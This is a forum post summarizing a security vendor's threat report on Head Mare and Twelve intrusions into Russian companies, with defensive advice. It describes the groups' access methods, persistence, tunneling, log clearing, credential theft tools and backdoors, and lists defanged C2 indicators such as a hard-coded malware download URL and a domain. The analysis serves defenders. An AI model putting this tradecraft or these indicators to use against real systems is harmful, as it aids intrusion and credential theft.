Navigation section

Evolving Cyber Threats: Hacktivist Tactics from Head Mare and Twelve

  • Thread Author
The recent investigation into cyberattacks targeting Russian companies underscores a worrying evolution in hacktivist tactics. In a series of incidents during September 2024, two groups—Head Mare and Twelve—appeared to have joined forces, sharing both techniques and even command-and-control (C2) infrastructure. This comprehensive analysis dives into the technical details uncovered in the report, the methods deployed by these adversaries, and what Windows users and IT professionals can learn from their evolving tactics.

windowsforum-evolving-cyber-threats-hacktivist-tactics-from-head-mare-and-twelve.webp
A Convergence of Hacktivist Operations​

The research reveals that Head Mare, previously known for its phishing-driven intrusions, has stepped up its game by adopting tools and tactics long associated with the Twelve group. Notably:
  • Shared Toolkits: Head Mare’s recent campaigns employed several publicly available and leaked tools, including mimikatz, ADRecon, secretsdump, ProcDump, and utilities like mRemoteNG and PSExec. What makes this particularly significant is the adoption of the CobInt backdoor—a tool that had only been seen in Twelve’s operations until now.
  • Command-and-Control Overlap: Head Mare’s use of C2 servers that were previously linked exclusively to Twelve suggests coordinated or collaborative operations between the groups. This convergence is not only a sign of shared resources but also of a strategic evolution in their operational security and infrastructure choices.
  • New Entrants in the Arsenal: The introduction of the PhantomJitter backdoor in August 2024 represents another shift. Deployed on servers for remote command execution, this tool further blurs the lines between the previously separate kill chains of Head Mare and Twelve.

Technical Anatomy of the Attack​

Initial Intrusion and Access Methods​

The attackers expanded their traditional phishing techniques by compromising trusted relationships. Here’s how they gained access:
  • Phishing & Vulnerability Exploitation:
  • Phishing emails with malicious attachments continue to be a primary vector.
  • Exploitation of vulnerabilities such as CVE-2023-38831 in WinRAR and the long-known ProxyLogon vulnerability (CVE-2021-26855) on Microsoft Exchange servers (a critical concern given that many organizations still run outdated software).
  • Compromised Contractors and RDP Abuse:
  • Beyond phishing, the attackers infiltrated networks through compromised contractors with legitimate access to business automation platforms.
  • They leveraged Remote Desktop Protocol (RDP) connections—an age-old yet still potent method when not sufficiently secured.
Summary: The combination of social engineering, exploitation of software vulnerabilities, and abuse of trusted relationships provided multiple avenues for these threat actors to breach secure environments.

Establishing a Foothold: Persistence and Anti-Detection Measures​

Once inside, the adversaries quickly established persistence while sneaking past detection mechanisms:
  • Privileged Local Accounts:
  • Instead of the more traditional scheduled tasks, attackers now create new local users with elevated privileges on business automation platforms. This approach not only aids persistence but also leverages RDP for interactive tool transfers.
  • Traffic Tunneling Services:
  • Tools like Localtonet, when combined with the Non-Sucking Service Manager (NSSM), offer a reliable way to run non-service applications as if they were native Windows services. This stealthy installation means that even if basic task scheduling is monitored, the traffic tunneling remains concealed.
  • File Masquerading and Log Clearing:
  • The attackers renamed executables—imagine cmd.exe being repurposed as log.exe—to blend into legitimate system processes.
  • They also went to lengths to clear event logs and remove traces of their services using PowerShell commands, making forensic investigations even more challenging.
Quick Tips for Windows Users:
Regularly monitor system logs and consider deploying enhanced logging solutions that can alert you to unusual file renaming or new account creation activities.

Command and Control (C2) Infrastructure​

The command and control methodology reflects sophistication and resource sharing:
  • PhantomJitter Backdoor Deployment:
  • After exploiting business automation servers, the attackers downloaded the PhantomJitter backdoor from hard-coded URLs (e.g., using addresses like http://45.87.246[.]34:443/calc.exe). This malware established a direct tunnel for remote command execution.
  • CobInt Backdoor Revisited:
  • Aligning with Twelve’s previous footprint, CobInt payloads connected to domains such as 360nvidia[.]com, resolving to specific IP addresses. By merging these tools, the attackers not only diversified their C2 options but also increased redundancy in their command infrastructure.
Reflection: For IT administrators, it’s crucial to monitor outbound connections for anomalies, especially connections to IP addresses or domains that have previously been flagged in threat intelligence reports.

Pivoting with Custom PowerShell Scripts​

A particularly interesting aspect of the attack involves a custom PowerShell script—proxy.ps1—that plays a dual role:
  • Dual-Role Script:
  • The script downloads an archive, extracts it, and installs crucial tunneling tools like cloudflared and Gost, mimicking standard Windows services by placing executables in the System32 folder.
  • It allows dynamic configuration using command-line parameters (such as specifying port numbers and tokens), thereby streamlining the setup of these proxies.
  • Execution Details:
    The script’s options include:
  • Installing the Gost service with a substitution in service configuration files.
  • Configuring cloudflared with a secure token for establishing encrypted tunnels.
  • The ability to uninstall these services cleanly when the -u flag is triggered, which was also highlighted in the investigation.
Recommendation: Ensure that PowerShell logging is configured to capture script execution details. This can be invaluable in identifying the misuse of legitimate tools and administration scripts.

Reconnaissance, Privilege Escalation, and Further Exploitation​

The attackers didn’t stop at initial access and persistence—they conducted detailed internal reconnaissance:
  • Reconnaissance Tools:
  • Standard system utilities like quser.exe, tasklist.exe, and netstat.exe were deployed along with network-specific tools such as SoftPerfect Network Scanner and fscan.
  • The use of ADRecon scripts allowed for a granular assessment of the internal Active Directory environment, mapping computers, group memberships, and trust relationships.
  • Post-Exploitation Tactics:
  • Upon gaining remote access, the adversaries executed a command that invoked PowerShell (using techniques to bypass execution policies). This command fetched a remote script (vivo.txt) suspected of launching a reverse shell.
  • The reverse shell activity resulted in the creation of persistent scripts (e.g., mcdrive.vbs and mcdrive.ps1) coupled with registry modifications to generate autorun entries.
  • Credential Stealing:
  • Tools such as mimikatz, secretsdump, and a newly identified Go-based sample (update.exe) were utilized to extract credentials and critical system files (like the ntds.dit file).
  • The aggressive credential access aligns with best-known practices in lateral movement and further exploitation of compromised environments.
Security Note: Regularly audit credential usage and consider solutions that provide real-time alerts for abnormal processes, especially those attempting to extract sensitive data from directories or registry hives.

Implications for Windows Security and Best Practices​

The evolving tactics observed in this investigation signal several important takeaways for IT professionals:
  • Patch Management is Paramount:
    With vulnerabilities like ProxyLogon remaining exploitable on legacy systems (e.g., Windows Server 2012 R2, Microsoft Exchange 2016), timely patching and system updates are no longer optional—it’s a critical security practice.
  • Enhanced Monitoring and Logging:
    Given the stealthy tactics such as file masquerading and event log clearing, implementing advanced logging and monitoring systems that detect anomalies in user account activity or system file modifications is essential.
  • User Awareness and Training:
    Social engineering remains a key component of these attacks. Ongoing employee training and robust email filtering are necessary to prevent initial compromise.
  • Zero Trust and Network Segmentation:
    Given that attackers exploited trusted relationships between contractors and internal systems, adopting a Zero Trust architecture with strict network segmentation can substantially reduce lateral movement risks.
Final Thought: As hackers continue to refine their methods by integrating new tools with legacy techniques, the cybersecurity landscape demands a proactive and layered security approach. Windows users and IT professionals must be ever-vigilant, continuously updating and scrutinizing every facet of their network defenses.

In Closing​

The intricate interplay between Head Mare and Twelve in these joint campaigns offers a stark reminder that threat actors are not working in isolation—their collaboration further complicates attribution and defense. By dissecting the techniques, persistence mechanisms, and C2 strategies used in these attacks, security teams are better equipped to forecast potential vectors of compromise and fortify their systems. Vigilance, proactive patching, and a deep understanding of both emerging and established threat tools are key to staying ahead in this relentless cybersecurity arms race.
Source: Securelist Head Mare and Twelve: Joint attacks on Russian entities
 

Last edited:
Click to expand...
You must log in or register to reply here.
Back
Top